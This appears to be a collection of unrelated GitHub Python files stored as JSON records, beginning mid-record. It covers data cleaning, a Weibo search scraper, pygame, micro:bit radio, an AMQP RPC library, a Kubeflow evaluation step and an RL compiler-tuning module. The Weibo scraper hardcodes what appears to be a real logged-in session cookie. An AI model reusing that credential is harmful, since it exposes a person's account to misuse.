Irrigation[['T_DaysOfData']].fillna(value=0)\nIrrigation = Irrigation[Irrigation['WAPRate'] >= 5]\n\nIrrigation['PercentOfData'] = Irrigation['T_DaysOfData']/365 *100\nIrrigation['PercentOfData'] = Irrigation['PercentOfData'].round(0).astype(int)\n\nIrrigation.rename(columns={'T_DaysOfData': 'DaysOfData'}, inplace=True)\n\n\nIrrigation.to_csv('Irrigation.csv')\n","repo_name":"Data-to-Knowledge/IrrigationCompanies","sub_path":"IrrigationCompanies.py","file_name":"IrrigationCompanies.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40952838047","text":"import csv\nfrom collections import defaultdict\n\nimport requests\n\nCSV_URL = 'https://bit.ly/2HiD2i8'\n\n\ndef get_csv():\n    \"\"\"Use requests to download the csv and return the\n    decoded content\"\"\"\n    r = requests.get(CSV_URL)\n    return r.text\n\n\ndef create_user_bar_chart(content):\n    \"\"\"Receives csv file (decoded) content and returns a table of timezones\n    and their corresponding member counts in pluses (see Bite/tests)\"\"\"\n    reader = csv.DictReader(content.splitlines())\n    tz_map = defaultdict(list)\n    for line in reader:\n        tz = line['tz']\n        if '/' in tz:\n            tz_map[tz].append('+')\n    for tz, users in sorted(tz_map.items()):\n        print(f\"{tz:21}| {''.join(users)}\")\n\ncreate_user_bar_chart(get_csv())\n\ndef get_csv():\n    \"\"\"Use requests to download the csv and return the\n    decoded content\"\"\"\n    with requests.Session() as s:\n        download = s.get(CSV_URL)\n        return download.content.decode('utf-8')\n\n\ndef create_user_bar_chart(content):\n    \"\"\"Receives csv file (decoded) content and returns a table of timezones\n    and their corresponding member counts in pluses (see Bite/tests)\"\"\"\n    reader = csv.DictReader(content.splitlines(), delimiter=',')\n    timezones = defaultdict(int)  # tally of members per timezone\n    for row in reader:\n        tz = row['tz']\n        timezones[tz] += 1\n\n    for location, count in 
sorted(timezones.items()):\n        print(f'{location:<20} | {\"+\"*count}')\n","repo_name":"natenka/100-days-of-Python","sub_path":"talkpython-100-days/day023/intermediate/bite_079.py","file_name":"bite_079.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"}
+{"seq_id":"30964698487","text":"from microbit import *\nimport radio\n\nPREFIX = \"ROV:\"\n\nradio.on()\nradio.config(channel=5, address = 0xffffffff)\n\nwhile True:\n    if button_a.was_pressed():\n        radio.send(PREFIX + \"CORRECT\")\n        display.show(Image.ARROW_N)\n        sleep(500)\n        \n    if button_b.was_pressed():\n        radio.send(PREFIX + \"INCORRECT\")\n        display.show(Image.ARROW_S)\n        sleep(500)\n        \n    display.clear()","repo_name":"ncss/projects-2017-5","sub_path":"project-C/Test Controller.py","file_name":"Test Controller.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"74106498028","text":"import sympy as sym\nimport itertools\nfrom printing import print_coeffs, print_matrix\nimport string\nRat = sym.Rational\nMat = sym.Matrix\nSym = sym.symbols\nHalf = Rat(1,2)\nThird = Rat(1,3)\nQuarter = Rat(1,4)\ndef Rec(n):\n    return Rat(1, n)\n\n\ndef sylvester_matrix(p, q):\n    degp = len(p)-1\n    degq = len(q)-1\n    n = degp + degq\n    M = [[0 for _ in range(n)] for __ in range(n)]\n    for i in range(degq):\n        for j in range(degp+1):\n            M[i+j][i] = p[j]\n    for i in range(degp):\n        for j in range(degq+1):\n            M[i+j][degq+i] = q[j]\n    return sym.Matrix(M)\n\ndef resultant(p, q):\n    return sylvester_matrix(p, q).det()\n\n\ndef general_discriminant(degree):\n    assert(degree <= 25)\n    variables = sym.symbols(\" \".join(string.ascii_lowercase[:degree+1]))\n    p = variables[::-1]\n    pp = [i*p[i] for i in range(1, len(p))]\n    print_matrix(sylvester_matrix(p, pp))\n    return (-(1/variables[0]) * resultant(p, pp)).expand()\n\n\n\nS = sylvester_matrix([1,-1,3,-3], [3,-1,-2])\nprint_matrix(S)\nprint(S.det())\n\nprint(general_discriminant(2))\nprint(general_discriminant(3))\n","repo_name":"LucasPayne/python_math","sub_path":"resultants.py","file_name":"resultants.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"172897881","text":"\r\nfrom datetime import datetime, timedelta\r\nimport requests\r\nfrom lxml import etree\r\nfrom threading import Thread as PyThread\r\nimport spider\r\n\r\n\r\ndef findfirsttime(keywords, start, end):\r\n    yourcookie = 'SINAGLOBAL=2603107289436.293.1675522222904; UOR=,,cn.bing.com; wvr=6; SUBP=0033WrSXqPxfM725Ws9jqgMF55529P9D9W5.Aap9wgTyUKMB.F4zxYcd5JpX5KMhUgL.FoMfehn01KzpeK52dJLoIp7LxKML1KBLBKnLxKqL1hnLBoMpe0eR1KepS0ME; ALF=1678603839; SSOLoginState=1676011839; SCF=AlD7SMY5okWeWCTQax_FsWfB5IKJ_EOx_Ixm1Fb1ReZUZ_DS8KLNKHVyarYuWgPBbxk1xzz7woABRgdS5WKhnug.; SUB=_2A25O4ZlvDeRhGeFL61oS-SzNyjyIHXVtlo2nrDV8PUNbmtANLXf_kW9NQpkafH0cuExd4GX-DNaoq9FFCrCALl_q; _s_tentry=weibo.com; Apache=411274957712.8527.1676011848869; ULV=1676011848902:6:6:5:411274957712.8527.1676011848869:1675954171555'\r\n    # keywords = input(\"Enter keyword: \")\r\n    # start = input(\"Enter start time: \")\r\n    # end = input(\"Enter end time: \")\r\n    keywords = keywords\r\n    start = start\r\n    end = end\r\n    pages = 1 #############\r\n    is_data = 1\r\n    url = 'https://s.weibo.com/weibo?q={0}&typeall=1&suball=1&timescope=custom:{1}:{2}&Refer=g&page={3}'.format(\r\n        keywords,\r\n        start, end,\r\n        pages)\r\n    header = {\r\n        'authority': 's.weibo.com',\r\n        
'method': 'GET',\r\n        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36',\r\n        'cookie': yourcookie\r\n        # 'referer':url\r\n    }\r\n    # now=datetime.now()\r\n    # print(datetime.strptime(end,\"%Y-%m-%d\").date())\r\n    # print((datetime.strptime(end,\"%Y-%m-%d\").date()-datetime.strptime(start,\"%Y-%m-%d\").date()).days)\r\n    # print(now-timedelta(days=0.5))\r\n\r\n    response = requests.get(url=url, headers=header)\r\n    context = response.text\r\n\r\n    # Extract the time\r\n    tree = etree.HTML(context)\r\n    # Check whether any results were returned\r\n    result = tree.xpath('//div[@class=\"card card-no-result s-pt20b40\"]')\r\n\r\n    if len(result) == 1:\r\n        print(\"No matching results found\")\r\n        is_data = 0\r\n    else:\r\n        l = datetime.strptime(start, \"%Y-%m-%d\").date()\r\n        r = datetime.strptime(end, \"%Y-%m-%d\").date()\r\n        thedays = (r - l).days\r\n        # print(thedays)\r\n        flag = 1\r\n        value1 = 0\r\n        while flag == 1:\r\n            if thedays != 1:\r\n                if is_data == 1:\r\n                    value1 = thedays % 2\r\n                    thedays = int(thedays / 2)\r\n                    r = r - timedelta(days=thedays + value1)\r\n                else:\r\n                    r = r + timedelta(days=thedays + value1)\r\n                    l = l + timedelta(days=thedays + value1)\r\n\r\n            else:\r\n                print(\"The start date is between {0} and {1}\".format(l,r))\r\n                # print(tkinter.messagebox.showinfo('Trace result',\"The date of the first post is between {0} and {1}\".format(l,r)))\r\n                thread_searchold=PyThread(target=spider.search,args=(keywords, l, r,2))\r\n                thread_searchold.setDaemon(True)\r\n                thread_searchold.start()\r\n                flag = 0\r\n                break\r\n            url = 'https://s.weibo.com/weibo?q={0}&typeall=1&suball=1&timescope=custom:{1}:{2}&Refer=g&page={3}'.format(\r\n                keywords, str(l), str(r), pages)\r\n            response = requests.get(url=url, headers=header)\r\n            context = response.text\r\n            tree = etree.HTML(context)\r\n            result = tree.xpath('//div[@class=\"card card-no-result s-pt20b40\"]')\r\n            if len(result) == 1:\r\n                is_data = 0\r\n                # print(\"none\")\r\n            else:\r\n                is_data = 1\r\n            # user_name = tree.xpath(\r\n            #     '//div[@class=\"m-wrap\"]/div[1]/div[2]/div[{0}]//div[@class=\"content\"]/div/div[2]/a[1]/text()'.format(\r\n            #         1))[0]\r\n            # print(user_name)\r\n            # print(\"{0}-----------{1}\".format(l,r))\r\n\r\n    # return r\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    findfirsttime('李白', '2022-1-1', '2023-1-2')\r\n","repo_name":"beiluoqingkong/weibospider","sub_path":"shuoyuan/findtime.py","file_name":"findtime.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10377577031","text":"import pygame\r\nimport sys\r\nfrom pygame.locals import *\r\n\r\npygame.init()\r\n\r\n#/////////////////////////////////////////////////////////////////////////\r\n\r\nscreen = pygame.display.set_mode((640, 460))\r\nscreen.fill((255, 255, 255))\r\npygame.display.set_caption('Bubble Buster!')\r\n\r\n#///////////////////////////////////////////////////////////////////////\r\n\r\n#create and set up values for the player\r\nplayer = pygame.Rect(300, 400, 60, 10)\r\nplayer_speed = 3\r\n\r\nmove_left = False\r\nmove_right = False\r\n\r\n#///////////////////////////////////////////////////////////////////////\r\n\r\ndef draw_screen():\r\n    screen.fill((255, 255, 255))\r\ndef draw_player():\r\n    pygame.draw.rect(screen, (0, 0, 0), player)\r\n\r\n#///////////////////////////////////////////////////////////////////////\r\n\r\n#values for all bubbles to use\r\nall_bubbles = []\r\n\r\nbubble_radius = 20\r\nbubble_edge = 1\r\ninitial_bubble_position = 70\r\nbubble_spacing = 
60\r\n\r\n#////////////////////////////////////////////////////////////////////////\r\n\r\ndef create_bubbles():\r\n bubble_x = initial_bubble_position\r\n bubble_y = initial_bubble_position\r\n\r\n for rows in range(0, 3):\r\n for columns in range(0, 10):\r\n bubble = pygame.draw.circle((screen), (0, 0, 0), (bubble_x, bubble_y), bubble_radius, bubble_edge)\r\n bubble_x += bubble_spacing\r\n all_bubbles.append(bubble)\r\n bubble_y += bubble_spacing\r\n bubble_x = initial_bubble_position\r\n\r\n\r\n\r\ncreate_bubbles()\r\n\r\ndef draw_bubbles():\r\n for bubble in all_bubbles:\r\n bubble = pygame.draw.circle((screen), (0, 0, 0), (bubble.x, bubble.y), bubble_radius, bubble_edge)\r\n\r\nwhile True:\r\n # check for events\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n #Keyboard input for players\r\n if event.type == KEYDOWN:\r\n if event.key == K_a:\r\n move_right = False\r\n move_left = True\r\n if event.key == K_d:\r\n move_left = False\r\n move_right = True\r\n if event.type == KEYUP:\r\n if event.key == K_a:\r\n move_left = False\r\n if event.key == K_d:\r\n move_right = False\r\n\r\n #Move the player\r\n if move_left and player.left > 0:\r\n player.x -= player_speed\r\n if move_right and player.right < 640:\r\n player.x += player_speed\r\n\r\n draw_screen()\r\n draw_player()\r\n draw_bubbles()\r\n pygame.display.update()\r\n","repo_name":"mtruesda/IDTechCamp","sub_path":"BubbleRun.py","file_name":"BubbleRun.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2440941855","text":"import FWCore.ParameterSet.Config as cms\nfrom FWCore.ParameterSet.VarParsing import VarParsing\n\nimport os\n\nfrom esdqmconfig import config\n\noptions = VarParsing('analysis')\noptions.register('generalTag', default = 'GLOBAL', mult = VarParsing.multiplicity.singleton, mytype = VarParsing.varType.string)\noptions.register(\"runType\",default = \"COSMIC\", mult = VarParsing.multiplicity.singleton, mytype = VarParsing.varType.string)\noptions.parseArguments()\n\nos.environ[\"TNS_ADMIN\"] = \"/etc\"\n\nprocess = cms.Process(\"DQMDB\")\n\nprocess.source = cms.Source(\"EmptySource\")\n\nprocess.load(\"DQM.ESMonitorDbModule.ESCondDBWriter_cfi\")\n# process.ESCondDBWriter.DBName = config.dbwrite.dbName\n# process.ESCondDBWriter.userName = config.dbwrite.dbUserName\n# process.ESCondDBWriter.password = config.dbwrite.dbPassword\n# process.ESCondDBWriter.hostName = config.dbwrite.dbHostName\n# process.ESCondDBWriter.hostPort = int(config.dbwrite.dbHostPort)\nprocess.ESCondDBWriter.location = 'P5_Co'\nprocess.ESCondDBWriter.runType = options.runType \nprocess.ESCondDBWriter.runGeneralTag = options.generalTag\nprocess.ESCondDBWriter.monRunGeneralTag = 'CMSSW-offline-private'\nprocess.ESCondDBWriter.inputRootFiles = cms.untracked.vstring(options.inputFiles)\nprocess.ESCondDBWriter.verbosity = 2\n\nprocess.load(\"DQMServices.Core.DQM_cfg\")\nprocess.DQMStore.verbose = 5\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(1)\n)\n\nprocess.load(\"Configuration.StandardSequences.GeometryRecoDB_cff\")\nprocess.load(\"DQM.Integration.config.FrontierCondition_GT_cfi\")\n# process.load(\"DQM.Integration.config.FrontierCondition_GT_autoExpress_cfi\")\n# from Configuration.StandardSequences.FrontierConditions_GlobalTag_cff import *\n# from Configuration.AlCa.GlobalTag import GlobalTag as gtCustomise\n# GlobalTag = gtCustomise(GlobalTag, 'auto:run2_data', 
'')\n\nprocess.MessageLogger = cms.Service('MessageLogger',\n destinations = cms.untracked.vstring('cout'),\n categories = cms.untracked.vstring('ESDQM'),\n cout = cms.untracked.PSet(\n threshold = cms.untracked.string('INFO'),\n ESDQM = cms.untracked.PSet(\n limit = cms.untracked.int32(-1)\n ),\n default = cms.untracked.PSet(\n limit = cms.untracked.int32(0)\n )\n )\n)\nprocess.p = cms.Path(process.ESCondDBWriter)\n","repo_name":"tanmaymudholkar/ESPedestalsAutomationHelper","sub_path":"writeESDB_cfg.py","file_name":"writeESDB_cfg.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"172897881","text":"from kfp.components import InputPath\nfrom typing import NamedTuple\n\n\ndef eval_xgboost(\n test_path:InputPath('CSV'),\n modelname:str,\n modelregistry:str,\n access_key_id:str,\n acces_key_secret:str,\n)-> NamedTuple('EvalOutputs', [('eval_accuracy', float),('eval_roc_auc_score', float)]):\n \n import pandas as pd\n import boto3\n import tempfile\n import joblib\n from xgboost import XGBClassifier\n from collections import namedtuple\n from sklearn.metrics import accuracy_score, roc_auc_score\n \n test_data = pd.read_csv(test_path)\n \n X_test = test_data.drop([\"salary\"], axis=1)\n y_test = test_data[\"salary\"].to_list()\n \n with tempfile.TemporaryFile() as fp:\n s3_client = boto3.client('s3',aws_access_key_id=access_key_id,aws_secret_access_key=acces_key_secret)\n s3_client.download_fileobj(Fileobj=fp, Bucket=modelregistry, Key=modelname)\n fp.seek(0)\n xgb_model = joblib.load(fp)\n \n y_pred = xgb_model.predict(X_test)\n roc_auc = roc_auc_score(y_test,y_pred)\n accuracy = accuracy_score(y_test,y_pred)\n \n output = namedtuple(\"EvalOutputs\",[\"eval_accuracy\",\"eval_roc_auc_score\"])\n return output(accuracy, roc_auc)\n\n\nif __name__ == \"__main__\":\n\n from kfp.components import create_component_from_func\n eval_xgboost_op = create_component_from_func(\n eval_xgboost, output_component_file=\"../components_yaml/eval_xgboost_component.yaml\", \n base_image= \"python:3.8\",\n packages_to_install = [\"boto3\",\"pandas\",\"scikit-learn\",\"xgboost\"]\n )","repo_name":"BADJEMM98/cas-pratique-kubeflow","sub_path":"src/kf_components/model_evaluation.py","file_name":"model_evaluation.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8241044470","text":"# -*- coding: utf-8 -*-\n\"\"\"Async RPC library based on AMQP protocol.\n\"\"\"\nimport asyncio\nimport inspect\nimport json\n\nimport counter\nimport msgpack\n\n\nasync def server_codec(connection, name, formatter):\n \"\"\"Create RPC server codec.\n\n The codec can be used to register a service which can be a class or a\n function. The function or a class method should accept only 1 argument to\n be a service endpoint. 
This approach was chosen to mimic golang net/rpc\n    library for easy integration with it.\n\n    Args:\n        connection: AMQP connection.\n        name: Codec name is used for routing messages to services registered\n            in the codec.\n        formatter: Contains methods pack(data) and unpack(data) to translate\n            a python object to/from binary representation.\n\n    Returns:\n        RPC server codec.\n    \"\"\"\n    channel = await connection.channel()\n    codec = _ServerCodec(channel)\n\n    async def onrequest(channel, body, envelope, properties):\n        response = await _get_response(codec.callables, body, properties,\n                                       formatter)\n        await channel.basic_publish(**response)\n\n    await channel.queue_declare(queue_name=name)\n    await channel.basic_consume(onrequest, no_ack=True, queue_name=name)\n\n    return codec\n\n\nasync def client_codec(connection, name, formatter):\n    \"\"\"Create RPC client codec.\n\n    The codec can be used to create RPC clients.\n\n    Args:\n        connection: AMQP connection.\n        name: Codec name is used for routing messages to services registered\n            in the codec.\n        formatter: Contains methods pack(data) and unpack(data) to translate\n            a python object to/from binary representation.\n\n    Returns:\n        RPC client codec.\n\n    \"\"\"\n    channel = await connection.channel()\n    queue = await channel.queue_declare(\"\")\n    codec = _ClientCodec(channel, name, queue[\"queue\"], formatter)\n\n    async def onresponse(channel, body, envelope, properties):\n        request = codec.reqgen.requests.pop(int(properties.message_id), None)\n        if request:\n            request.response.headers = properties.headers or {}\n            if \"error\" not in request.response.headers:\n                request.response.body = formatter.unpack(body)\n            request.event.set()\n\n    await channel.basic_consume(\n        onresponse, no_ack=True, queue_name=queue[\"queue\"])\n\n    return codec\n\n\nasync def _get_response(callables, body, properties, formatter):\n    if properties.reply_to is None:\n        raise ValueError(\"properties.reply_to cannot be None\")\n\n    response = {\n        \"exchange_name\": \"\",\n        \"routing_key\": properties.correlation_id,\n        \"properties\": {\n            \"correlation_id\": properties.correlation_id,\n            \"message_id\": properties.message_id,\n            \"reply_to\": properties.reply_to\n        }\n    }\n\n    func = callables.get(properties.reply_to)\n    result = None\n\n    if func:\n        args = formatter.unpack(body)\n        try:\n            if inspect.iscoroutinefunction(func):\n                result = await func(args)\n            else:\n                result = func(args)\n        except Exception as ex:\n            response[\"properties\"][\"headers\"] = {\"error\": str(ex)}\n    else:\n        response[\"properties\"][\"headers\"] = {\n            \"error\": \"unknown function {0}\".format(properties.reply_to)\n        }\n\n    response[\"payload\"] = formatter.pack(result)\n    return response\n\n\nclass MsgPack:\n    \"\"\"Represents msgpack format provider.\n    \"\"\"\n\n    @staticmethod\n    def pack(data):\n        return msgpack.packb(data)\n\n    @staticmethod\n    def unpack(data):\n        return msgpack.unpackb(data, encoding=\"utf-8\")\n\n\nclass Json:\n    \"\"\"Represents json format provider.\n    \"\"\"\n\n    @staticmethod\n    def pack(data):\n        return json.dumps(data)\n\n    @staticmethod\n    def unpack(data):\n        return json.loads(data, encoding=\"utf-8\")\n\n\nclass _RequestGenerator:\n    \"\"\"Represents request generator.\n    \"\"\"\n\n    def __init__(self):\n        self.requests = {}\n        self.counter = counter.UInt64()\n\n    def __call__(self):\n        num = self.counter.inc()\n        req = _Request(num)\n        self.requests[num] = req\n        return req\n\n\nclass _Response:\n    \"\"\"Represents RPC response.\n    \"\"\"\n\n    def __init__(self):\n        self.headers = None\n        self.body = None\n\n\nclass _Request:\n    
\"\"\"Represents RPC request.\n \"\"\"\n\n def __init__(self, num):\n self.num = num\n self.event = asyncio.Event()\n self.response = _Response()\n\n\n# TODO(vbogretsov): consider using of conext manager interface.\nclass _Codec:\n \"\"\"Base codec.\n \"\"\"\n\n def __init__(self, channel):\n self.channel = channel\n\n async def close(self):\n if self.channel.is_open:\n await self.channel.close()\n\n\nclass _ServerCodec(_Codec):\n \"\"\"Represents server RPC codec.\n \"\"\"\n\n def __init__(self, channel):\n super(_ServerCodec, self).__init__(channel)\n self.callables = {}\n\n def register(self, server):\n name = getattr(server, \"__name__\", server.__class__.__name__)\n\n if callable(server):\n self.callables[name] = server\n\n for attrname in dir(server):\n if not attrname.startswith(\"_\"):\n attr = getattr(server, attrname)\n # TODO(vbogretsov): check function has 1 argument.\n if callable(attr):\n fullname = \"{0}.{1}\".format(name, attrname)\n self.callables[fullname] = attr\n\n\nclass _ClientCodec(_Codec):\n \"\"\"Represents client RPC codec.\n \"\"\"\n\n def __init__(self, channel, routing_key, correlation_id, formatter):\n super(_ClientCodec, self).__init__(channel)\n self.routing_key = routing_key\n self.correlation_id = correlation_id\n self.reqgen = _RequestGenerator()\n self.formatter = formatter\n\n def client(self, server_name):\n return _Client(server_name, self.channel, self.reqgen,\n self.routing_key, self.correlation_id, self.formatter)\n\n\nclass _Client:\n \"\"\"Represents RPC client.\n \"\"\"\n\n def __init__(self, srvname, channel, reqgen, routing_key, correlation_id,\n formatter):\n self.srvname = srvname\n self.channel = channel\n self.reqgen = reqgen\n self.routing_key = routing_key\n self.correlation_id = correlation_id\n self.formatter = formatter\n\n def __getattr__(self, name):\n reply_to = \"{0}.{1}\".format(self.srvname, name)\n\n async def call(args):\n request = self.reqgen()\n\n properties = {\n \"correlation_id\": self.correlation_id,\n \"reply_to\": reply_to,\n \"message_id\": str(request.num)\n }\n\n await self.channel.basic_publish(\n exchange_name=\"\",\n routing_key=self.routing_key,\n payload=self.formatter.pack(args),\n properties=properties)\n\n await asyncio.wait_for(request.event.wait(), timeout=60)\n\n if \"error\" in request.response.headers:\n raise RPCError(request.response.headers[\"error\"])\n\n return request.response.body\n\n setattr(self, name, call)\n return call\n\n\nclass RPCError(Exception):\n \"\"\"Represents RPC error.\n \"\"\"\n pass","repo_name":"vbogretsov/py-amqprpc","sub_path":"amqprpc.py","file_name":"amqprpc.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34458959998","text":"import os\nfrom PIL import Image\n\n\nclass ImageResizer:\n def __init__(self):\n project_path = os.path.abspath(os.curdir)\n folder_path = \"train\"\n self.dataset_path = os.path.join(project_path, f\"input/{folder_path}\")\n self.output_path = os.path.join(project_path, f\"output/{folder_path}\")\n self.targeted_size = (800, 600)\n self.targeted_extension = [\".JPG\", \".jpg\"]\n\n def get_files_in_dataset(self):\n folder_path = self.dataset_path\n\n file_paths = []\n if not os.path.isdir(folder_path):\n return file_paths\n\n for file in sorted(os.listdir(folder_path)):\n file_name, extension = os.path.splitext(file)\n if extension not in self.targeted_extension:\n continue\n\n file_path = os.path.join(folder_path, file)\n if 
os.path.isfile(file_path):\n file_paths.append(file_path)\n return file_paths\n\n def resize_image(self, file_path):\n file_name = os.path.basename(file_path)\n save_file_path = os.path.join(self.output_path, file_name)\n\n with Image.open(file_path) as img:\n img.load()\n image = img.resize(self.targeted_size, Image.LANCZOS) # Image.Resampling.LANCZOS\n image.save(save_file_path, quality=100)\n\n print(image.size)\n\n def resize_image_with_crop(self, file_path):\n file_name = os.path.basename(file_path)\n save_file_path = os.path.join(self.output_path, file_name)\n\n with Image.open(file_path) as img:\n img.load()\n\n width, height = img.size\n new_width, new_height = self.targeted_size\n\n width_precision = 0\n height_precision = 0\n if width % 2 == 1:\n width -= 1\n width_precision = 1\n if height % 2 == 1:\n height -= 1\n height_precision = 1\n # precision will be for odd pixels, add one pixel only one side\n\n left_right_px = (width - new_width) // 2\n up_bottom_px = (height - new_height) // 2\n\n left = 0 + left_right_px + width_precision\n upper = 0 + up_bottom_px\n right = width - left_right_px\n lower = height - up_bottom_px + height_precision\n\n image = img.crop((left, upper, right, lower))\n image.save(save_file_path, quality=100)\n\n # new_size = (800, 600)\n # image = img.resize(new_size, Image.LANCZOS) # Image.Resampling.LANCZOS\n # image.save(save_file_path, quality=100)\n\n print(image.size)\n\n def process_folder(self):\n image_files = self.get_files_in_dataset()\n for file in image_files:\n self.resize_image_with_crop(file)\n\n\nif __name__ == '__main__':\n image_resizer = ImageResizer()\n image_resizer.process_folder()\n","repo_name":"SaimumIslam/Image-resizer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35763948940","text":"import sqlite3\nimport os\nimport re\nimport time\nfrom ray.tune import Stopper\nfrom SuperSonic.policy_definition.Algorithm import *\nfrom SuperSonic.utils.engine.config_search import ConfigSearch\nimport SuperSonic\nimport SuperSonic.utils.environments.CSR_env\n\n\nclass TimeStopper(Stopper):\n \"\"\"A :class: An interface for implementing a Tune experiment stopper.\"\"\"\n\n def __init__(self, deadline):\n \"\"\"Create the TimeStopper object.\n Stops the entire experiment when the time has past deadline\n \"\"\"\n self._start = time.time()\n self._deadline = deadline # set time\n\n def __call__(self, trial_id, result):\n \"\"\"Returns true if the trial should be terminated given the result.\"\"\"\n\n return False\n\n def stop_all(self):\n \"\"\"Returns true if the experiment should be terminated.\"\"\"\n\n return time.time() - self._start > self._deadline\n\n\nclass CustomStopper(Stopper):\n \"\"\"A :class: An interface for user customization implementing a Tune experiment stopper.\"\"\"\n\n def __init__(self, obs_file):\n \"\"\"Create the TimeStopper object.\n Stops the entire experiment when the time has past deadline\n :param obs_file: the shared file location.\n \"\"\"\n self.obs_file = obs_file\n self.should_stop = False\n self._start = time.time()\n self._deadline = 80\n\n def __call__(self, trial_id, result):\n \"\"\"Returns true if the trial should be terminated given the result.\"\"\"\n\n # if not self.should_stop and time.time() - self._start > self.deadline:\n if not self.should_stop and os.path.exists(self.obs_file):\n os.remove(self.obs_file)\n with os.popen(f'netstat -nutlp | grep 
\"50055\"') as r:\n result = r.read()\n PID = []\n for line in result.split(\"\\n\"):\n if r\"/\" in line:\n PID.extend(re.findall(r\".*?(\\d+)\\/\", line))\n PID = list(set(PID))\n for pid in PID:\n try:\n os.system(f\"kill -9 {pid}\")\n except Exception as e:\n print(e)\n\n self.should_stop = True\n\n return self.should_stop\n\n def stop_all(self):\n \"\"\"Returns whether to stop trials and prevent new ones from starting.\"\"\"\n return self.should_stop\n\n\nclass CSR:\n def __init__(self, policy, data=\"\", training_iterations=50):\n \"\"\"A :class:\n A interface to run CSR.\n To apply a tuned RL, SuperSonic creates a session to apply a standard RL loop to minimize the code size\n by using the chosen RL exploration algorithms to determines which pass to be added into or removed from\n the current compiler pass sequence.\n \"\"\"\n # database\n # rootpath = os.path.abspath('../SQL/supersonic.db')\n # print(rootpath)\n # print(\"!!!!!!!!!!!!!!!!!!!!!!!!!\")\n\n self.sql_path = os.path.abspath(\"./SuperSonic/SQL/supersonic.db\")\n # self.sql_path = os.path.abspath(\"/home/huanting/supersonic/SUPERSONIC/SuperSonic/SQL/supersonic.db\")\n\n conn = sqlite3.connect(self.sql_path)\n c = conn.cursor()\n try:\n c.execute(\n \"\"\"CREATE TABLE CSR\n (\n TIME FLOAT NOT NULL,\n BENCHMARK TEXT NOT NULL,\n RESULT TEXT NOT NULL,\n REWARD FLOAT NOT NULL,\n PRIMARY KEY ('TIME'));\"\"\"\n )\n print(\"Table created successfully\")\n except:\n pass\n conn.commit()\n conn.close()\n self.training_iterations = training_iterations\n self.deadline = 5\n self.environment_path = SuperSonic.utils.environments.CSR_env.csr_rl\n self.state_function = policy[\"StatList\"]\n self.action_function = policy[\"ActList\"]\n self.reward_function = policy[\"RewList\"]\n self.algorithm = policy[\"AlgList\"]\n self.experiment = \"csr\"\n self.local_dir = os.path.abspath(\"./SuperSonic/logs/model_save\")\n self.benchmark = data\n self.seed = \"0xCC\"\n self.log_path = os.path.abspath(\"./CSR/result\")\n self.pass_path = os.path.abspath(\"./CSR/pass\")\n\n # stopper = TimeStopper(self.deadline)\n stopper = {\"time_total_s\": self.deadline}\n self.task_config = {\n \"sql_path\": self.sql_path,\n \"benchmark\": self.benchmark,\n \"seed\": self.seed,\n \"log_path\": self.log_path,\n \"pass_path\": self.pass_path,\n \"deadline\": self.deadline,\n \"stop\": stopper,\n \"state_function\": self.state_function,\n \"action_function\": self.action_function,\n \"reward_function\": self.reward_function,\n \"algorithm\": self.algorithm,\n \"experiment\": self.experiment,\n \"local_dir\": self.local_dir,\n \"training_iterations\": self.training_iterations,\n }\n # self.environment_path = \"tasks.src.opt_test.MCTS.environments.halide_env.HalideEnv_PPO\"\n\n def startclient(self):\n pass\n\n def sql(self):\n \"\"\"Database connection\"\"\"\n conn = sqlite3.connect(\"./SuperSonic/SQL/supersonic.db\")\n print(\"Opened database successfully\")\n\n def run(self):\n \"\"\"To start RL agent with specific policy strategy and parameters\"\"\"\n RLAlgorithms(self.task_config).Algorithms(\n self.algorithm, self.task_config, self.environment_path\n )\n\n def Config(self, iterations):\n best_config = ConfigSearch(self.task_config).Algorithms(\n self.algorithm, self.task_config, self.environment_path, iterations\n )\n return best_config\n\n # def main(self):\n # # CSR.sql(self)\n # # CSR.startserve(self)\n # CSR.run(self)\n\n\nclass TaskEngine:\n \"\"\"A :class: An interface to run specific Task environment and agent.\"\"\"\n\n def __init__(self, policy):\n 
